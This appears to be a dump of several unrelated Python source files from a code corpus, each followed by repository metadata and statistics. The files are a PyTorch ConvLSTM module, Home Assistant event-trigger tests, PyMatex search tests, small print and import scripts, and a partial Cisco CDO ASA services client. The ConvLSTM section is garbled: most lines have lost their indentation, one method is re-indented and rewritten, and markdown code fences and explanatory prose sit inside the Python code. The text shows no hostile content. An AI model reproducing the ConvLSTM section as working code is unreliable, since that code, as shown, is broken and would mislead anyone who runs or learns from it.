self.kernel_size = kernel_size
self.num_features = 4
self.padding = int((kernel_size - 1) / 2)
self.Wxi = nn.Conv2d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)
self.Whi = nn.Conv2d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)
self.Wxf = nn.Conv2d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)
self.Whf = nn.Conv2d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)
self.Wxc = nn.Conv2d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)
self.Whc = nn.Conv2d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)
self.Wxo = nn.Conv2d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)
self.Who = nn.Conv2d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)
self.Wci = None
self.Wcf = None
self.Wco = None
def forward(self, x, h, c):
ci = torch.sigmoid(self.Wxi(x) + self.Whi(h) + c * self.Wci)
cf = torch.sigmoid(self.Wxf(x) + self.Whf(h) + c * self.Wcf)
cc = cf * c + ci * torch.tanh(self.Wxc(x) + self.Whc(h))
co = torch.sigmoid(self.Wxo(x) + self.Who(h) + cc * self.Wco)
ch = co * torch.tanh(cc)
return ch, cc
def init_hidden(self, batch_size, hidden, shape):
if self.Wci is None:
self.Wci = Variable(torch.zeros(1, hidden, shape[0], shape[1])).cuda()
self.Wcf = Variable(torch.zeros(1, hidden, shape[0], shape[1])).cuda()
self.Wco = Variable(torch.zeros(1, hidden, shape[0], shape[1])).cuda()
else:
assert shape[0] == self.Wci.size()[2], 'Input Height Mismatched!'
assert shape[1] == self.Wci.size()[3], 'Input Width Mismatched!'
return (Variable(torch.zeros(batch_size, hidden, shape[0], shape[1])).cuda(),
Variable(torch.zeros(batch_size, hidden, shape[0], shape[1])).cuda())
class ConvLSTM(nn.Module):
# input_channels corresponds to the first input feature map
# hidden state is a list of succeeding lstm layers.
def __init__(self, input_channels, hidden_channels, kernel_size, step=1, effective_step=[0]):
super(ConvLSTM, self).__init__()
self.input_channels = [input_channels] + hidden_channels
self.hidden_channels = hidden_channels
self.kernel_size = kernel_size
self.num_layers = len(hidden_channels)
self.step = step
self.effective_step = effective_step
self._all_layers = []
for i in range(self.num_layers):
name = 'cell{}'.format(i)
cell = ConvLSTMCell(self.input_channels[i], self.hidden_channels[i], self.kernel_size)
setattr(self, name, cell)
self._all_layers.append(cell)
def forward(self, input):
internal_state = []
outputs = []
for step in range(self.step):
x = input
for i in range(self.num_layers):
# all cells are initialized in the first step
name = 'cell{}'.format(i)
if step == 0:
bsize, _, height, width = x.size()
(h, c) = getattr(self, name).init_hidden(batch_size=bsize, hidden=self.hidden_channels[i],
shape=(height, width))
internal_state.append((h, c))
# do forward
(h, c) = internal_state[i]
x, new_c = getattr(self, name)(x, h, c)
internal_state[i] = (x, new_c)
# only record effective steps
if step in self.effective_step:
outputs.append(x)
return outputs, (x, new_c)
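The gate algebra in `ConvLSTMCell.forward` can be sanity-checked in scalar form. A self-contained sketch with every convolution collapsed to a single shared weight — purely illustrative: shapes, biases, and the learned peephole weights `Wci/Wcf/Wco` are all simplified away:

```python
import math


def sigmoid(z: float) -> float:
    return 1.0 / (1.0 + math.exp(-z))


def lstm_cell_step(x: float, h: float, c: float, w: float = 0.5):
    ci = sigmoid(w * x + w * h + w * c)           # input gate  (Wxi, Whi, Wci)
    cf = sigmoid(w * x + w * h + w * c)           # forget gate (Wxf, Whf, Wcf)
    cc = cf * c + ci * math.tanh(w * x + w * h)   # new cell state
    co = sigmoid(w * x + w * h + w * cc)          # output gate (Wxo, Who, Wco)
    ch = co * math.tanh(cc)                       # new hidden state
    return ch, cc


ch, cc = lstm_cell_step(x=1.0, h=0.0, c=0.0)
assert -1.0 < ch < 1.0 and -1.0 < cc < 1.0        # gates keep values bounded
```

The convolutional version applies exactly these equations element-wise over feature maps, with each `w * _` term replaced by a `Conv2d` (or `Conv3d`) over the input or hidden state.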
class ConvLSTMCell3d(nn.Module):
def __init__(self, input_channels, hidden_channels, kernel_size):
super(ConvLSTMCell3d, self).__init__()
assert hidden_channels % 2 == 0
self.input_channels = input_channels
self.hidden_channels = hidden_channels
self.kernel_size = kernel_size
self.num_features = 4
self.padding = 0 # int((kernel_size - 1) / 2)
self.Wxi = nn.Conv3d(in_channels=self.input_channels,
out_channels=self.hidden_channels,
kernel_size=self.kernel_size,
stride=1, padding=self.padding,
bias=True)
self.Whi = nn.Conv3d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)
self.Wxf = nn.Conv3d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)
self.Whf = nn.Conv3d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)
self.Wxc = nn.Conv3d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)
self.Whc = nn.Conv3d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)
self.Wxo = nn.Conv3d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)
self.Who = nn.Conv3d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)
self.Wci = None
self.Wcf = None
self.Wco = None
def forward(self, x, h, c):
ci = torch.sigmoid(self.Wxi(x) + self.Whi(h) + c * self.Wci)
cf = torch.sigmoid(self.Wxf(x) + self.Whf(h) + c * self.Wcf)
cc = cf * c + ci * torch.tanh(self.Wxc(x) + self.Whc(h))
co = torch.sigmoid(self.Wxo(x) + self.Who(h) + cc * self.Wco)
ch = co * torch.tanh(cc)
return ch, cc
    def init_hidden(self, batch_size, hidden, shape):
        # torch.autograd.Variable is deprecated; plain tensors carry autograd now.
        # Allocate on the same device as the cell weights instead of hard-coding .cuda().
        device = self.Wxi.weight.device
        if self.Wci is None:
            # Peephole weights; note they are zeros and not nn.Parameters,
            # so they are never trained (kept as in the original code).
            self.Wci = torch.zeros(1, hidden, shape[0], shape[1], shape[2], device=device)
            self.Wcf = torch.zeros(1, hidden, shape[0], shape[1], shape[2], device=device)
            self.Wco = torch.zeros(1, hidden, shape[0], shape[1], shape[2], device=device)
        else:
            assert shape[0] == self.Wci.size()[2], 'Input Height Mismatched!'
            assert shape[1] == self.Wci.size()[3], 'Input Width Mismatched!'
            assert shape[2] == self.Wci.size()[4], 'Input Depth Mismatched!'
        return (torch.zeros(batch_size, hidden, shape[0], shape[1], shape[2], device=device),
                torch.zeros(batch_size, hidden, shape[0], shape[1], shape[2], device=device))
# CHANGES from the original code:
# - step now indexes the trajectory
# - got rid of the effective_step filtering because I need to save every step
#   (note: the parameter and the check still appear in the class below)
# - the 3D conv only needs 1 input channel, so I dropped the requirement that
#   the number of input channels be even (its purpose was unclear anyway)
class ConvLSTM3d(nn.Module):
# input_channels corresponds to the first input feature map
# hidden state is a list of succeeding lstm layers.
def __init__(self, input_channels, hidden_channels, kernel_size, step=1, effective_step=[0]):
super(ConvLSTM3d, self).__init__()
self.input_channels = [input_channels] + hidden_channels
self.hidden_channels = hidden_channels
self.kernel_size = kernel_size
self.num_layers = len(hidden_channels)
self.step = step
self.effective_step = effective_step
self._all_layers = []
for i in range(self.num_layers):
name = 'cell{}'.format(i)
cell = ConvLSTMCell3d(self.input_channels[i], self.hidden_channels[i], self.kernel_size)
setattr(self, name, cell)
self._all_layers.append(cell)
def forward(self, input):
internal_state = []
outputs = []
for step in range(self.step):
x = input
for i in range(self.num_layers):
# all cells are initialized in the first step
name = 'cell{}'.format(i)
if step == 0:
bsize, _, height, width, depth = x.size()
(h, c) = getattr(self, name).init_hidden(batch_size=bsize,
hidden=self.hidden_channels[i],
shape=(height, width, depth))
internal_state.append((h, c))
# do forward
(h, c) = internal_state[i]
x, new_c = getattr(self, name)(x, h, c)
internal_state[i] = (x, new_c)
# only record effective steps
if step in self.effective_step:
outputs.append(x)
return outputs, (x, new_c)
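# Since the cells above convolve a recurrent state, the padding choice decides
# whether that state keeps its spatial size across steps. A pure-Python sketch
# (not part of the original code; conv_out is a made-up helper):

```python
def conv_out(size, kernel, padding, stride=1):
    """Length of one spatial dim after a conv (standard PyTorch formula)."""
    return (size + 2 * padding - kernel) // stride + 1

# padding=0 ('valid') shrinks each spatial dim by kernel - 1 per conv ...
print(conv_out(32, 3, 0))             # 30
# ... while (kernel - 1) // 2 keeps odd-kernel spatial sizes fixed ('same').
print(conv_out(32, 3, (3 - 1) // 2))  # 32
```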
if __name__ == '__main__':
# gradient check
convlstm = ConvLSTM(input_channels=512, hidden_channels=[128, 64, 64, 32, 32], kernel_size=3, step=5,
effective_step=[4]).cuda()
loss_fn = torch.nn.MSELoss()
    input = torch.randn(1, 512, 64, 32).cuda()  # Variable is deprecated; use tensors
    target = torch.randn(1, 32, 64, 32).double().cuda()
output = convlstm(input)
output2 = output[0][0].double()
res = torch.autograd.gradcheck(loss_fn, (output2, target), eps=1e-6, raise_exception=True)
print(res)
pdb.set_trace()
print('hi') | 47.423256 | 119 | 0.610043 | 1,377 | 10,196 | 4.366739 | 0.135802 | 0.10943 | 0.095792 | 0.084151 | 0.811908 | 0.806586 | 0.806586 | 0.801763 | 0.794113 | 0.794113 | 0 | 0.018135 | 0.26991 | 10,196 | 215 | 120 | 47.423256 | 0.789629 | 0.067085 | 0 | 0.592593 | 0 | 0 | 0.016548 | 0 | 0 | 0 | 0 | 0 | 0.04321 | 1 | 0.061728 | false | 0 | 0.024691 | 0 | 0.148148 | 0.012346 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
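# The __main__ block above calls torch.autograd.gradcheck; for reference, a
# minimal CPU-only sketch of its expected usage (double-precision inputs with
# requires_grad=True; the function and shapes here are illustrative, not from
# the original):

```python
import torch

# gradcheck compares autograd gradients against finite differences; it expects
# double-precision inputs that require grad, and tiny tensors keep it fast.
x = torch.randn(4, 3, dtype=torch.double, requires_grad=True)
w = torch.randn(3, 2, dtype=torch.double, requires_grad=True)
ok = torch.autograd.gradcheck(lambda a, b: (a @ b).sum(), (x, w), eps=1e-6)
print(ok)
```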
8c9b9b3bfe9a283884709dc4112979036d85f802 | 46 | py | Python | Part_1_beginner/04_print_function/special_separator_3.py | Mikma03/InfoShareacademy_Python_Courses | 3df1008c8c92831bebf1625f960f25b39d6987e6 | [
"MIT"
] | null | null | null | Part_1_beginner/04_print_function/special_separator_3.py | Mikma03/InfoShareacademy_Python_Courses | 3df1008c8c92831bebf1625f960f25b39d6987e6 | [
"MIT"
] | null | null | null | Part_1_beginner/04_print_function/special_separator_3.py | Mikma03/InfoShareacademy_Python_Courses | 3df1008c8c92831bebf1625f960f25b39d6987e6 | [
"MIT"
] | 1 | 2021-02-20T08:30:56.000Z | 2021-02-20T08:30:56.000Z |
print("My favourite sport is \\triathlon\ ")
| 15.333333 | 44 | 0.695652 | 6 | 46 | 5.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152174 | 46 | 2 | 45 | 23 | 0.820513 | 0 | 0 | 0 | 0 | 0 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
8ca7caaa0a55affaa1c1a80379fc6d3e4bbd965a | 12,158 | py | Python | tests/components/homeassistant/triggers/test_event.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 30,023 | 2016-04-13T10:17:53.000Z | 2020-03-02T12:56:31.000Z | tests/components/homeassistant/triggers/test_event.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 31,101 | 2020-03-02T13:00:16.000Z | 2022-03-31T23:57:36.000Z | tests/components/homeassistant/triggers/test_event.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 11,956 | 2016-04-13T18:42:31.000Z | 2020-03-02T09:32:12.000Z | """The tests for the Event automation."""
import pytest
import homeassistant.components.automation as automation
from homeassistant.const import ATTR_ENTITY_ID, ENTITY_MATCH_ALL, SERVICE_TURN_OFF
from homeassistant.core import Context
from homeassistant.setup import async_setup_component
from tests.common import async_mock_service, mock_component
@pytest.fixture
def calls(hass):
"""Track calls to a mock service."""
return async_mock_service(hass, "test", "automation")
@pytest.fixture
def context_with_user():
"""Create a context with default user_id."""
return Context(user_id="test_user_id")
@pytest.fixture(autouse=True)
def setup_comp(hass):
"""Initialize components."""
mock_component(hass, "group")
async def test_if_fires_on_event(hass, calls):
"""Test the firing of events."""
context = Context()
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"action": {
"service": "test.automation",
"data_template": {"id": "{{ trigger.id}}"},
},
}
},
)
hass.bus.async_fire("test_event", context=context)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].context.parent_id == context.id
await hass.services.async_call(
automation.DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: ENTITY_MATCH_ALL},
blocking=True,
)
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["id"] == 0
async def test_if_fires_on_templated_event(hass, calls):
"""Test the firing of events."""
context = Context()
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger_variables": {"event_type": "test_event"},
"trigger": {"platform": "event", "event_type": "{{event_type}}"},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire("test_event", context=context)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].context.parent_id == context.id
await hass.services.async_call(
automation.DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: ENTITY_MATCH_ALL},
blocking=True,
)
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_multiple_events(hass, calls):
"""Test the firing of events."""
context = Context()
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "event",
"event_type": ["test_event", "test2_event"],
},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire("test_event", context=context)
await hass.async_block_till_done()
hass.bus.async_fire("test2_event", context=context)
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[0].context.parent_id == context.id
assert calls[1].context.parent_id == context.id
async def test_if_fires_on_event_extra_data(hass, calls, context_with_user):
"""Test the firing of events still matches with event data and context."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire(
"test_event", {"extra_key": "extra_data"}, context=context_with_user
)
await hass.async_block_till_done()
assert len(calls) == 1
await hass.services.async_call(
automation.DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: ENTITY_MATCH_ALL},
blocking=True,
)
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_event_with_data_and_context(hass, calls, context_with_user):
"""Test the firing of events with data and context."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "event",
"event_type": "test_event",
"event_data": {
"some_attr": "some_value",
"second_attr": "second_value",
},
"context": {"user_id": context_with_user.user_id},
},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire(
"test_event",
{"some_attr": "some_value", "another": "value", "second_attr": "second_value"},
context=context_with_user,
)
await hass.async_block_till_done()
assert len(calls) == 1
hass.bus.async_fire(
"test_event",
{"some_attr": "some_value", "another": "value"},
context=context_with_user,
)
await hass.async_block_till_done()
assert len(calls) == 1 # No new call
hass.bus.async_fire(
"test_event",
{"some_attr": "some_value", "another": "value", "second_attr": "second_value"},
)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_event_with_templated_data_and_context(
hass, calls, context_with_user
):
"""Test the firing of events with templated data and context."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger_variables": {
"attr_1_val": "milk",
"attr_2_val": "beer",
"user_id": context_with_user.user_id,
},
"trigger": {
"platform": "event",
"event_type": "test_event",
"event_data": {
"attr_1": "{{attr_1_val}}",
"attr_2": "{{attr_2_val}}",
},
"context": {"user_id": "{{user_id}}"},
},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire(
"test_event",
{"attr_1": "milk", "another": "value", "attr_2": "beer"},
context=context_with_user,
)
await hass.async_block_till_done()
assert len(calls) == 1
hass.bus.async_fire(
"test_event",
{"attr_1": "milk", "another": "value"},
context=context_with_user,
)
await hass.async_block_till_done()
assert len(calls) == 1 # No new call
hass.bus.async_fire(
"test_event",
{"attr_1": "milk", "another": "value", "attr_2": "beer"},
)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_event_with_empty_data_and_context_config(
hass, calls, context_with_user
):
"""Test the firing of events with empty data and context config.
The frontend automation editor can produce configurations with an
empty dict for event_data instead of no key.
"""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "event",
"event_type": "test_event",
"event_data": {},
"context": {},
},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire(
"test_event",
{"some_attr": "some_value", "another": "value"},
context=context_with_user,
)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_event_with_nested_data(hass, calls):
"""Test the firing of events with nested data."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "event",
"event_type": "test_event",
"event_data": {"parent_attr": {"some_attr": "some_value"}},
},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire(
"test_event", {"parent_attr": {"some_attr": "some_value", "another": "value"}}
)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_not_fires_if_event_data_not_matches(hass, calls):
"""Test firing of event if no data match."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "event",
"event_type": "test_event",
"event_data": {"some_attr": "some_value"},
},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire("test_event", {"some_attr": "some_other_value"})
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_not_fires_if_event_context_not_matches(
hass, calls, context_with_user
):
"""Test firing of event if no context match."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "event",
"event_type": "test_event",
"context": {"user_id": "some_user"},
},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire("test_event", {}, context=context_with_user)
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_fires_on_multiple_user_ids(hass, calls, context_with_user):
"""Test the firing of event when the trigger has multiple user ids."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "event",
"event_type": "test_event",
"event_data": {},
"context": {"user_id": [context_with_user.user_id, "another id"]},
},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire("test_event", {}, context=context_with_user)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_event_data_with_list(hass, calls):
"""Test the (non)firing of event when the data schema has lists."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "event",
"event_type": "test_event",
"event_data": {"some_attr": [1, 2]},
"context": {},
},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire("test_event", {"some_attr": [1, 2]})
await hass.async_block_till_done()
assert len(calls) == 1
# don't match a single value
hass.bus.async_fire("test_event", {"some_attr": 1})
await hass.async_block_till_done()
assert len(calls) == 1
# don't match a containing list
hass.bus.async_fire("test_event", {"some_attr": [1, 2, 3]})
await hass.async_block_till_done()
assert len(calls) == 1
| 29.653659 | 87 | 0.556917 | 1,325 | 12,158 | 4.815849 | 0.087547 | 0.047955 | 0.041373 | 0.055164 | 0.834352 | 0.81821 | 0.785143 | 0.761793 | 0.74283 | 0.724024 | 0 | 0.005786 | 0.317651 | 12,158 | 409 | 88 | 29.726161 | 0.76338 | 0.017273 | 0 | 0.604863 | 0 | 0 | 0.168622 | 0 | 0 | 0 | 0 | 0 | 0.115502 | 1 | 0.009119 | false | 0 | 0.018237 | 0 | 0.033435 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8ca95d533d0d15abc6108952f1d65ecf31857894 | 1,672 | py | Python | tests/search/SearchQuery.py | Gawaboumga/PyMatex | 3ccc0aa23211a064aa31a9b509b108cd606a4992 | [
"MIT"
] | 1 | 2019-03-05T09:45:04.000Z | 2019-03-05T09:45:04.000Z | tests/search/SearchQuery.py | Gawaboumga/PyMatex | 3ccc0aa23211a064aa31a9b509b108cd606a4992 | [
"MIT"
] | null | null | null | tests/search/SearchQuery.py | Gawaboumga/PyMatex | 3ccc0aa23211a064aa31a9b509b108cd606a4992 | [
"MIT"
] | null | null | null | from tests import BaseTest
from pymatex.search import SearchQuery
class SearchQueryTests(BaseTest.BaseTest):
def test_read(self):
s = SearchQuery(path='tests/search/resources/search-content-simple-tests.txt')
def test_search_simple(self):
s = SearchQuery(path='tests/search/resources/search-content-simple-tests.txt')
results = s.search(r'(ky+o)')
self.assertListEqual(list(map(lambda x: x[0], results)), [2, 1])
def test_search_less_simple(self):
s = SearchQuery(path='tests/search/resources/search-content-simple-tests.txt')
results = s.search(r'(ky+o) * (uy^{2} + vy + n)')
self.assertListEqual(list(map(lambda x: x[0], results)), [1, 2])
def test_search_summation_and_bound_variables(self):
s = SearchQuery(path='tests/search/resources/search-content-summation-tests.txt')
results = s.search(r'\sum_{k=0}^{\infty} k')
self.assertListEqual(list(map(lambda x: x[0], results)), [2, 1])
def test_search_weird_summation_and_fraction(self):
s = SearchQuery(path='tests/search/resources/search-content-weird-summation-tests.txt')
results = s.search(r'\sum_{k=0}^{\infty} k')
self.assertListEqual(list(map(lambda x: x[0], results)), [1, 3, 2])
def test_remove(self):
s = SearchQuery(path='tests/search/resources/search-content-simple-tests.txt')
results = s.search(r'(ky+o) * (uy^{2} + vy + n)')
self.assertListEqual(list(map(lambda x: x[0], results)), [1, 2])
s.remove(1)
results = s.search(r'(ky+o) * (uy^{2} + vy + n)')
self.assertListEqual(list(map(lambda x: x[0], results)), [2])
| 38 | 95 | 0.647727 | 238 | 1,672 | 4.470588 | 0.193277 | 0.039474 | 0.090226 | 0.112782 | 0.798872 | 0.798872 | 0.798872 | 0.798872 | 0.798872 | 0.699248 | 0 | 0.01757 | 0.183014 | 1,672 | 43 | 96 | 38.883721 | 0.761347 | 0 | 0 | 0.464286 | 0 | 0 | 0.276316 | 0.200957 | 0 | 0 | 0 | 0 | 0.214286 | 1 | 0.214286 | false | 0 | 0.071429 | 0 | 0.321429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8ced868760db7844739902b77e80163d14804aa4 | 39 | py | Python | tests/test_so.py | lazyxu/pythonvm | 8c25acc6ee1e01a0bb65bb35aae987264d6876aa | [
"MIT"
] | null | null | null | tests/test_so.py | lazyxu/pythonvm | 8c25acc6ee1e01a0bb65bb35aae987264d6876aa | [
"MIT"
] | null | null | null | tests/test_so.py | lazyxu/pythonvm | 8c25acc6ee1e01a0bb65bb35aae987264d6876aa | [
"MIT"
] | null | null | null | import libmath
print libmath.add(1, 2) | 13 | 23 | 0.769231 | 7 | 39 | 4.285714 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 0.128205 | 39 | 3 | 23 | 13 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.5 | null | null | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
50b01881feff7ab77d41b1e18ec713bff005d8ee | 20 | py | Python | vigobusapi/vigobus_getters/http/__init__.py | David-Lor/Python_VigoBusAPI | 2ba327654908b761b3086be2fec09bfebc6e3029 | [
"Apache-2.0"
] | 4 | 2019-07-18T22:25:31.000Z | 2021-03-09T19:01:14.000Z | vigobusapi/vigobus_getters/http/__init__.py | David-Lor/Python_VigoBusAPI | 2ba327654908b761b3086be2fec09bfebc6e3029 | [
"Apache-2.0"
] | 3 | 2021-09-12T20:15:38.000Z | 2021-09-18T16:35:27.000Z | vigobusapi/vigobus_getters/http/__init__.py | David-Lor/VigoBusAPI | 40db5a644f43a8f98cb40a9e5519a028fe18db14 | [
"Apache-2.0"
] | 3 | 2020-10-03T21:45:39.000Z | 2021-05-06T21:27:03.000Z | from .http import *
| 10 | 19 | 0.7 | 3 | 20 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 20 | 1 | 20 | 20 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
50bb05784e1ea3caad1078dec01819d01b8b82e3 | 2,770 | py | Python | pycdo/asa_services.py | aaronhackney/pycdo | 0c0b938b74dbc0ab45a1ed7926c2d5e2f8651e7a | [
"MIT"
] | null | null | null | pycdo/asa_services.py | aaronhackney/pycdo | 0c0b938b74dbc0ab45a1ed7926c2d5e2f8651e7a | [
"MIT"
] | 1 | 2022-03-17T22:38:44.000Z | 2022-03-17T22:38:44.000Z | pycdo/asa_services.py | aaronhackney/pycdo | 0c0b938b74dbc0ab45a1ed7926c2d5e2f8651e7a | [
"MIT"
] | null | null | null | from .base import CDOBaseClient
import logging
logger = logging.getLogger(__name__)
class CDOASAServices(CDOBaseClient):
"""Class for performing CDO ASA operations"""
# TODO: Full CRUD operations where available
# TODO: packettracer method(s)
def get_asa_config_summary_list(self):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/configs")
def get_asa_config_summary(self, device_uid):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/configs/{device_uid}")
def get_asa_nats_list(self):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/nats")
def get_asa_nat(self, nat_uid):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/nats/{nat_uid}")
def get_asa_twice_nat_events_list(self):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/twicenatevents")
def get_asa_twice_nat_events(self, twice_nat_uid):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/twicenatevents/{twice_nat_uid}")
def get_asa_exports_list(self):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/exports")
def get_asa_exports(self, export_uid):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/exports/{export_uid}")
def get_asa_templates_list(self):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/templates")
def get_asa_templates(self, template_uid):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/templates/{template_uid}")
def get_asa_debug_events_list(self):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/debugevents")
def get_asa_debug_events(self, events_uid):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/debugevents/{events_uid}")
def get_asa_ordered_nats_list(self, params):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/orderednats", params=params)
def get_asa_ordered_nats(self, ordered_nats_uid, params):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/orderednats/{ordered_nats_uid}", params=params)
def get_asa_configs_exports_list(self):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/configs-exports")
def get_asa_configs_exports(self, configs_exports_uid):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/configs-exports/{configs_exports_uid}")
def get_asa_nat_events_list(self):
return self.get_operation(f"{self.PREFIX_LIST['SERVICES']}/asa/natevents")
def get_asa_nat_events(self, nat_events_uid):
